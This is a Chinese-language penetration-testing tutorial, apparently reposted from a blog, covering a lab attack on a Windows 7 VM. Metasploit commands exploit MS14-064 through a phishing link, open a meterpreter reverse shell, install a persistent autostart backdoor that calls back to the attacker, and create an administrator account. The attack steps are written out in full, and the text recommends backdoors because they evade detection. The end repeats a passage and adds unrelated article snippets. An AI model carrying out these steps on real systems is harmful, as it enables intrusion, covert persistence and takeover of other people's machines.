钓鱼网站+persistence植入后门程序+创建用户

news/2024/4/26 7:10:55/文章来源:https://blog.csdn.net/text2201/article/details/129138917

本实验实现1: 利用MS14-064漏洞,会生成一个网址,诱导用户点击,打开后,会直接连接到发起攻击的主机上,即可攻击成功。

本实验实现2:
一旦入侵成功,则拿到控制目标主机的部分权限,后通过persistence,在目标主机上生成一个固定的后门程序,以便后续不再通过MS14-064漏洞进行二次入侵,而是通过这个后门文件来入侵该主机。在向目标主机成功植入后门后,进行验证,重新通过已植入的后门程序,二次入侵目标主机,最终攻击成功。

本实验实现3: 在kali控制win7后,实现创建用户的操作。

在VMware上建立两个虚拟机:win7和kali。

Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了600多种黑客工具,很强大。

可以永久免费使用,基本上学黑客攻击必会用到这个系统。

靶机:Win7 64位 (IP: 192.168.10.45)–用ipconfig进行查询。

1671014899_6399a9f3e5553e6d0794d.png!small?1671014900857

攻击机:Kali (IP:192.168.10.21)–用ifconfig进行查询。

1671004120_63997fd81cc3be5b118c7.png!small?1671004121622

1 、实验环境前提条件

win7中,关闭防火墙(“打开网络和共享中心”-“Windows防火墙”-“打开或关闭Windows防火墙”-均选择关闭选项)。

保证两个虚拟机是可以ping通的(尤其是在kali中去ping win7,看能否连通)。

$ping 192.168.10.45

1671014963_6399aa334142a7dcbbd93.png!small?1671014964866

2 、打开 Metasploit 渗透工具

Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端:

>msfconsole

结果: 成功进入,进入到"msf6>“的模式下

1669884976_63886c300ba3ce8ddedfa.png!small?1669884977752

3 、查看需要利用的漏洞

搜索漏洞,编号为MS14-064。

MS14-064为Windows
OLE自动化阵列远程代码执行漏洞。当IE不作访问内存中的对象时,存在远程代码执行漏洞。OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用IE浏览器查看该网站时允许远程执行代码。

补充 :Windows系统漏洞微软的漏洞编号命名格式为:MS14-064;

MS Micosoft的缩写,固定格式;
14 表示年份,即2014年发布的漏洞;
064 表示顺序,即当年度发布的第64个漏洞。

>search ms14-064

结果: 可以看到返回了多条可利用的漏洞模块信息

1671004421_63998105e066d3b5cd87b.png!small?1671004423990

4、尝试利用其中一个漏洞模块进行攻击

利用其中一个漏洞攻击模块-0模块,进行攻击,进入模块中( 注意 :必须是“_”,不是“-”,否则会报错)。

>use exploit/windows/browser/ms14_064_ole_code_execution

结果: 成功切换到这个模块之下–”msf6
exploit(windows/browser/ms14_064_ole_code_execution)>“

并提示“no payload configured,defaulting to
windows/meterpreter/reverse_tcp”–没有配置payload,默认为
windows/meterpreter/reverse_tcp

1671004493_6399814da491539fc255c.png!small?1671004494989

5、查看该漏洞模块所需的参数情况

进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数。

>show options

结果: 其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

重点关注6个参数配置,需要设置哪个就设置哪个:

Payload (攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) ;

SRVHOST (文件共享服务器-kali地址);

SRVPORT (文件共享服务器的端口-使用默认获取的端口即可);

LHOST (发起攻击的地址-kali地址);

LPORT (发起攻击的端口-使用默认获取的端口即可);

AllowPowershellPrompt (开启浏览器插件,默认为false)

1671004621_639981cda0435fda74036.png!small?1671004623253

1671004724_63998234e05adc227119b.png!small?1671004726334

补充说明:

1)Payload中包含有需要在远程系统中运行的恶意代码,Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。也就是说,漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。

2)Payload模块主要有以下三种类型:-Single -Stager -Stage

Single是一种完全独立的Payload,实现的目的也简单,但容易被捕捉到。

Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。 一种常见的Stagers
Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接(3次握手-4次挥手)(是一个基于TCP的反向链接反弹shell,
使用起来很稳定)。

Stage是Stager Payload下载的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。

3)windows/x64/meterpreter/reverse_tcp则由一个Stager Payload(reverse_tcp)和一个Stage
Payload(meterpreter)组成。

注意: Payload **windows/meterpreter/reverse_tcp **
默认获取到的控制通道 meterpreter 32 位,

如果想将之后获取到的控制通道 meterpreter 改为 64 位,则设置。
payload:windows/x64/meterpreter/reverse_tcp

6、设置文件共享服务器

发现SRVHOST为空,待设置,其它(payload/SRVPORT/LHOST/LPORT)均已获取,且正确,设置SRVHOST的对应的参数地址,它指的是文件共享服务器的地址,想一想,要设成谁?为什么?

分析一下:是在哪里用到这个文件共享服务器?是不是会在生成一个网址,诱导用户点击了,就会直接连接到发起攻击的主机上。那你们觉得应该是谁生成这个连接呢?是用户那边么?还是攻击者这边?肯定是攻击者这边吧,我们是不知道会有谁点了这个网站链接吧。

所以,我们才会对这个文件共享服务器的地址设置为kali的地址

>set SRVHOST 192.168.10.21

1671004816_63998290e505ee41e0b65.png!small?1671004818277

7、开启浏览器插件

要把AllowPowershellPrompt的默认参数false改为true,因为msf中自带的漏洞是利用exp调用的是powershell(powershell是一种命令外壳程序和脚本环境),所以msf的exp代码只对安装了powershell的系统生效。

>set AllowPowershellPrompt true

1671004876_639982ccb5e76e0eeab4d.png!small?1671004877961

8、再次进行检查

查看对SRVHOST和AllowPowershellPrompt进行的修改,是否修改成功

>show options

1671004976_639983303cc9d68898d4f.png!small?1671004977735

9、检查无误后,发起攻击

>run

结果: 生成一个网站的链接“Using URL :
http://192.168.10.21:8080/xE6RxjSy,开启服务,光标停留在这,等待有人点击该网站链接。

1671015109_6399aac5871e926f0195d.png!small?1671015111082

10、打开网站链接

到win7中,在IE浏览器中打开网站链接:
http://192.168.10.21:8080/xE6RxjSy,会提示是否允许打开一个文件,选择“允许”之后,即可触发会话连接。

注意: 与MS10-046的反馈结果有所不同,详情可参考我的另一篇文章《钓鱼网站+bypassuac提权》】

1671015222_6399ab36602cdde7c2fbd.png!small?1671015223553

结果1: 在win7中打开链接后,不会有任何的反馈结果。

1671015236_6399ab44e9bc2b61ea681.png!small?1671015237975

结果2:
由于在win7中触发打开了网址链接,那么,在kali中,则会触发会话连接,结果显示了是192.168.10.45(目标主机win7)尝试点击了该网站链接,于是,kali利用MS14-064漏洞模块对目标主机发起了攻击,最终,“meterpreter
session 1 opened”–表明已经开通192.168.10.21:4444和192.168.10.45:49191会话连接1。

一般会自动进入控制通道meterpreter,交互模式,表明攻击成功。

1671015293_6399ab7d17ddc86d3e4ce.png!small?1671015294414

1671015428_6399ac0476b0afd2b1b22.png!small?1671015429359

注意:

一旦开通一个会话连接后,若系统没有自动进入控制通道,则可以尝试回车,进行手动连接。

1)手动查看当前存在的会话

注意在目录msf>下,手动查看当前存在的会话。

结果: 当前只有会话连接1,meterpreter建立的连接类型type是x86–
32位的(由模块中的payload设定),以及展示目标主机192.168.10.45的基本信息和连接信息。

>sessions

1671015392_6399abe0781d99356fb92.png!small?1671015393564

2)选择连接当前已经开通的会话1

>sessions -i 1

结果: 成功进入控制通道meterpreter,交互模式,表明攻击成功。

1671015408_6399abf0377be92b5a85b.png!small?1671015409255

11、植入后门程序

在kali控制win7后, 通过persistence
,在目标主机上生成一个后门程序,以便后续不再通过MS14-064漏洞进行二次入侵,而是通过这个后门文件来入侵该主机【注意在控制通道meterpreter>下】。

注意: 因为这个 MS14-064漏洞很容易被修复 ,一旦目标主机进行定期修补漏洞,那么通过MS14-064漏洞进行
入侵的路径,就会失效 ,但 植入的后门程序是不容易被发现和修复的 ,所以一旦入侵成功后,建议尝试植入后门程序。

通过persistence(支持多种方式启动)植入固定的后门程序 ,设置相关参数,设置回连地址和端口号。

>run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21

重点关注6个参数配置:

-S:系统启动时自动加载本程序(因为该后门程序是不能被目标用户发现,更不需要让目标主机进行点

击启动的,所以需要该程序有自动加载的功能);

-U:用户登陆时自动加载本程序;

-X:开机时自动加载本程序;

-i: 自动加载后,回连的时间间隔,即后门每隔多少秒尝试连接回连地址;

-r: 自动加载后,回连的主机地址,回连到谁啊,自然是入侵的kali的地址;

-p:自动加载后,回连的端口号,即kali地址的端口号,理论上可随意设置,但范围不要超过65535,且

不可设置为常见的特殊的端口号;

结果1:
在kali中提示,成功生成一个后门程序yqLAOjt.vbs,自动加载后会回连到192.168.10.21:40000,并保存于目标主机win7中的C:\Users\18044\AppData\Local\Temp\目录下。

注意:
payload自动设置为“windows/meterpreter/reverse_tcp”,LHOST设置为192.168.10.21,LPORT设置为40000】

1671015497_6399ac49c713127081e35.png!small?1671015499012

结果2:
在win7中的C:\Users\18044\AppData\Local\Temp\目录下,成功找到从攻击主机kali植入的后门程序yqLAOjt.vbs

1671015789_6399ad6d91c9d3bdcf3ae.png!small?1671015790965

【补充知识点:

1)端口号范围:0~65535

1669798399_638719ff3edb1751047e3.png!small?1669798400282

2)常见端口号列举

1669798422_63871a1602d8df89fbb59.png!small?1669798422938

12、 挂起当前会话

在成功植入后门程序后,我们还需要对该后门程序进行验证,验证是否可以通过该后门程序成功入侵目标主机win7,所以可先将当前通过MS14-064漏洞开启的会话连接挂起(background)或断开(exit),均可

meterpreter>background

结果: 成功将session会话1挂起到后台,并没有断开连接,且成功切换到msf >目录下

1671015899_6399addb280d348928ba8.png!small?1671015900193

13、 开启监听模块

利用后门程序进行攻击,需要打开一个监听模块,能够反弹shell监听模块,进行攻击,进入模块中

>use exploit/multi/handler

结果: 成功切换到这个模块之下–”msf6 exploit(multi/handler)>“

并提示“Using configured payload
generic/shell_reverse_tcp”–使用的payload为generic/shell_reverse_tcp

1671015923_6399adf34116bdcfc3b1a.png!small?1671015924268

14、查看该监听模块所需的参数情况

进到这个监听模块之后,先查看该模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数?

>show options

结果: 其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

重点关注3个参数配置,需要设置哪个就设置哪个:

Payload:攻击载体;

LHOST:回连地址;

LPORT:回连端口号;

1671015964_6399ae1cc52c6c000e232.png!small?1671015966062

15、设置攻击载体、回连地址以及端口号

因为我们要开启的这个监听模块,是专门针对于yqLAOjt.vbs后门程序,进行实时监听,那么,必然需要将监听模块的参数配置,与yqLAOjt.vbs后门程序的参数配置保持一致,只有这样,才能达到准确的监听

之前制作yqLAOjt.vbs的参数为:

“run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21”

因此,我们也就需要将监听模块的攻击载体Payload,与后门程序的payload保持一致:

>set payload windows/meterpreter/reverse_tcp

需要将监听模块的回连地址LHOST,与后门程序的LHOST保持一致:

>set LHOST 192.168.10.21

需要将监听模块的回连地址的端口号LPORT,与后门程序的LPORT保持一致:

>set LPORT 40000

1671016063_6399ae7f8ca4b9e5349c3.png!small?1671016065130

16、再次进行检查

>show options

1671016085_6399ae950801c83ac8df4.png!small?1671016087655

17、检查无误后,发起攻击

>run

结果:
开启针对192.168.10.21:40000的监听模式,因为yqLAOjt.vbs后门程序已经设置了自动加载,所以一旦开启监听模块,立即会有反馈信息回连到192.168.10.21:40000上来。

最终,“meterpreter session 2
opened”–表明已经开通192.168.10.21:40000和192.168.10.45:49227的会话连接2。

一般会自动进入控制通道meterpreter,交互模式,表明攻击成功。

1671016150_6399aed681db616792619.png!small?1671016151696

注意:

此时,将当前开启的会话进行挂起操作–background,再查看当前已存在的会话–
sessions,结果会得到已开启两个会话连接信息,要对这两个会话连接进行区分,分清楚,
第一个会话连接是通过MS14-064漏洞开启的,第二个会话连接是通过后门程序开启的

1671016233_6399af29d27701bf50826.png!small?1671016234967

18、创建用户、设置密码

1)拿到shell权限,获得控制台权限,可以获取系统的控制台C:\Windows\system32

meterpreter>shell

1671016341_6399af95526b9e592694e.png!small?1671016342580

2)进入后,可能会有乱码的情况,解决乱码问题

C:\Windows\system32>chcp 65001

1671016398_6399afce7b1a166c41115.png!small?1671016400239

1671016426_6399afea5e3811addc7b0.png!small?1671016427417

1671016445_6399affd624e8b5a5224a.png!small?1671016446493

3)显示win7系统中所有的用户

C:\Windows\system32>net user

1671016445_6399affd624e8b5a5224a.png!small

4)创建用户

创建用户,用户名为test,密码为test【net user 用户名 密码 /add】

C:\Windows\system32>net user test test /add

也可以不设置密码,只创建用户名为test1的无密码用户【net user 用户名 /add】

C:\Windows\system32>net user test1 /add

结果1: 在kali中,若结果显示“the commad completed successfully”—代表“命令执行成功” ,用户创建成功 ;

若结果显示“system error 5 has occurred;access is denied”—“发生系统错误5;
拒绝访问”-----代表权限不够的问题,需要 进行提权,可以利用 bypassuac 或者Windows内核漏洞进行提权,
具体操作可以参考我的另外两篇文章《钓鱼网站+bypassuac提权》《木马程序攻击+利用Windows内核漏洞提权》

1671016525_6399b04d05169ebe395e3.png!small?1671016526364

1671016537_6399b0596a303fcc20e0f.png!small?1671016538401

1671016552_6399b06876f7e8ccb4625.png!small?1671016553524

结果2: 在win7中,”控制面板“—”添加或删除用户账户“,查看成功新建的用户test(标准用户–密码保护)、test1(标准用户–
无密码)

1671016601_6399b09921c29a6132c92.png!small?1671016602554

5)将新用户添加到administrator分组–提升到管理员权限【net localgroup administrators 用户名 /add】

C:\Windows\system32>net localgroup administrators test1 /add

结果1: 在kali中,显示“the commad completed successfully”—代表“命令执行成功”
,成功添加到administrator分组,提升管理员权限成功 ;

1671016765_6399b13d8494c0ef58736.png!small?1671016766705

结果2: 在win7中,”控制面板“—”添加或删除用户账户“,查看新建的用户test1用户由之前的”标准用户“提升至”管理员“,提升权限成功。

1671017008_6399b2300b7e0be5d43dc.png!small?1671017009120

存中…(img-7EiqGQWf-1676948802253)]

5)将新用户添加到administrator分组–提升到管理员权限【net localgroup administrators 用户名 /add】

C:\Windows\system32>net localgroup administrators test1 /add

结果1: 在kali中,显示“the commad completed successfully”—代表“命令执行成功”
,成功添加到administrator分组,提升管理员权限成功 ;

[外链图片转存中…(img-aaNpfeAR-1676948802254)]

结果2: 在win7中,”控制面板“—”添加或删除用户账户“,查看新建的用户test1用户由之前的”标准用户“提升至”管理员“,提升权限成功。

[外链图片转存中…(img-B14oAIW6-1676948802254)]

最后

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【扫下方二维码】免费领取:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_71951.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【论文阅读】SSR-Net: 一个小型的 软分段回归网络 用于年龄估计

原始题目SSR-Net: A Compact Soft Stagewise Regression Network for Age Estimation中文名称SSR-Net: 一个小型的 软分段回归网络 用于年龄估计发表时间2018年7月13日平台IJCAI-18来源台湾中央研究院、国立台湾大学文章链接https://www.ijcai.org/proceedings/2018/0150.pdf开…

2023-02-20干活小计:

所以我今天的活开始了: In this paper, the authors target the problem of Multimodal Name Entity Recognition(MNER) as an improvement on NER(text only) The paper proposes a multimodal fusion based on a heterogeneous graph of texts and images to mak…

Renegade:基于MPC+Bulletproofs构建的anonymous DEX

1. 引言 白皮书见: Renegade Whitepaper: Protocol Specification, v0.6 开源代码见: https://github.com/renegade-fi/renegade(Renegade p2p网络每个节点的核心网络和密码逻辑)https://github.com/renegade-fi/mpc-bulletpr…

OpenShift 4 - 将 VMware 虚机迁移至 OpenShift Virtualization(视频)- 温迁移

《OpenShift / RHEL / DevSecOps 汇总目录》 说明:本文已经在支持 OpenShift 4.12 的 OpenShift 环境中验证 文章目录了解 Warm Migration为 VMware VM 配置 CBT用 Warm Migration 方式迁移 VMware VM创建 Migration plan执行 Migration plan演示视频了解 Warm Migr…

漫画 | Python是一门烂语言?

这个电脑的主人是个程序员,他相继学习了C、Java、Python、Go, 但是似乎总是停留在Hello World的水平。 每天晚上,夜深人静的时候,这些Hello World程序都会热火朝天地聊天但是,这一天发生了可怕的事情随着各个Hello wor…

小程序(十)签到业务流程分析

文章目录一、如何获取地理信息?二、如何判定某地区新冠疫情的风险等级?系统的人脸签到模块包含的功能非常丰富,不仅仅只有人脸识别的签到功能,而且还可以根据用户签到时候的地理定位,计算出该地区是 新冠疫情 的 高风险…

【可视化实战】Python 绘制出来的数据大屏真的太惊艳了

今天我们在进行一个Python数据可视化的实战练习,用到的模块叫做Panel,我们通过调用此模块来绘制动态可交互的图表以及数据大屏的制作。 而本地需要用到的数据集,可在kaggle上面获取 https://www.kaggle.com/datasets/rtatman/188-million-us…

【STM32笔记】__WFI();进入不了休眠的可能原因(系统定时器SysTick一直产生中断)

【STM32笔记】__WFI();进入不了休眠的可能原因(系统定时器SysTick一直产生中断) 【STM32笔记】低功耗模式配置及避坑汇总 前文: blog.csdn.net/weixin_53403301/article/details/128216064 【STM32笔记】HAL库低功耗模式配置&am…

UnsupportedOperationException

原因&#xff1a;返回值为list时&#xff0c;返回值类型应为具体的类型参考文章&#xff1a;(139条消息) mybatis中返回结果类型为集合类型&#xff08;List、Map&#xff09;_毒毒毒毒丶的博客-CSDN博客_mybatis返回list<map>集合UnsupportedOperationException 是用于表…

【算法基础】线性、二分法查找

问题&#xff1a; 现有数组int[] arr new int[]{1,3,5,63,2,55,78}&#xff0c;找出值为2的元素&#xff0c;并返回其下标。 1. 线性查找&#xff08;顺序查找&#xff09; 声明两个变量&#xff1a;查找的元素、保存索引的变量用for循环依次遍历 注意&#xff1a; 这里只查…

TCP的三次握手、四次挥手

文章目录前言一、一些重要字段的含义二、TCP总括图三、三次握手详细过程1.第一次握手2.第二次握手3.第三次握手三次握手小结4.为什么必须要进行三次握手&#xff0c;两次或四次就不行四、四次挥手1.第一次挥手2.第二次挥手3.第三次挥手4.第四次挥手四次挥手简述前言 一个TCP的…

gulimall技术栈笔记

文章目录1.项目背景1.1电商模式1.2谷粒商城2.项目架构图3.项目技术&特色4.项目前置要求5.分布式基础概念5.1微服务5.2集群&分布式&节点5.3远程调用5.4负载均衡5.5服务注册/发现&注册中心5.6配置中心5.7服务熔断&服务降级5.7.1服务熔断5.7.2服务降级5.8API网…

Allegro如何通过报表的方式检查单板上是否有假器件操作指导

Allegro如何通过报表的方式检查单板上是否有假器件操作指导 在做PCB设计的时候,输出生产文件之前,必须保证PCB上不能存在假器件,如下图,是不被允许的 当PCB单板比较大,如何通过报表的方式检查是否存在假器件,具体操作如下 点击Tools点击Reports

【华为云-开发者专属集市】DevCloud+ECS、MySQL搭建WordPress

文章目录AppBazaar官网选择与购买项目项目概况操作过程购买DevCloud服务创建项目添加制品库应用部署购买ECS添加部署模板并执行任务故障排除安装及访问WordPress登录网站管理后台访问网站完善部署模板资源释放使用总结AppBazaar官网 首先&#xff0c;我们来到AppBazaar的官网&…

大数据Hadoop教程-01大数据导论与Linux基础

目录 01、大数据导论 02、Linux操作系统概述 P007 P008 P009 P010 P011 P012 P013 P014 P015 P016 P017 01、大数据导论 企业数据分析方向 现状分析&#xff08;分析当下的数据&#xff09;&#xff1a;现阶段的整体情况&#xff0c;各个部分的构成占比、发展、变…

揭开JavaWeb中Cookie与Session的神秘面纱

文章目录1&#xff0c;会话跟踪技术的概述2&#xff0c;Cookie2.1 Cookie的基本使用2.2 Cookie的原理分析2.3 Cookie的使用细节2.3.1 Cookie的存活时间2.3.2 Cookie存储中文3&#xff0c;Session3.1 Session的基本使用3.2 Session的原理分析3.3 Session的使用细节3.3.1 Session…

通过命令行快速了解电脑CPU架构

Linux 和 MacOS 使用终端&#xff08;小黑窗&#xff09;执行下面的命令&#xff0c;根据输出结果查表&#xff1a; uname -m输出 的内容分别对应架构 输出对应架构i386, i686i386x86_64amd64arm, armelarm_garbagearmv7l, armhfarmv7*mipsmips*mips64mips64*Window 按 WinR …

【强化学习】解决gym安装Atari2600环境gym[atari,accept-rom-license] RuntimeError 无法下载Roms的问题

先上Roms.tar.gz安装地址&#xff1a;Roms.tar.gz 以下内容是解决问题的思路&#xff0c;如果已经完全知道问题原因可以直接跳过 安装gym[accept-rom-license]时会出现安装失败的情况: 先是卡在&#xff1a;Building wheel for AutoROM.accept-rom-license 然后是显示安装失败…

预告|2月25日 第四届OpenI/O 启智开发者大会昇腾人工智能应用专场邀您共启数字未来!

如今&#xff0c;人工智能早已脱离科幻小说中的虚构想象&#xff0c;成为可触及的现实&#xff0c;并渗透到我们的生活。随着人工智能的发展&#xff0c;我们正在迎来一个全新的时代——数智化时代。数据、信息和知识是这个时代的核心资源&#xff0c;而人工智能则是这些资源的…

感知数据温度,聚焦海量冷数据存储难题

在信息科技高速发展的背景之下&#xff0c;海量数据已经让拥有者和管理者应接不暇&#xff0c;根据IDC发布的《数据时代2025》预测&#xff0c;全球数据圈&#xff08;数据圈代表每年被创建、采集或是复制的数据集合&#xff09;将从2018 年的32ZB增至2025年的175ZB。2018年&am…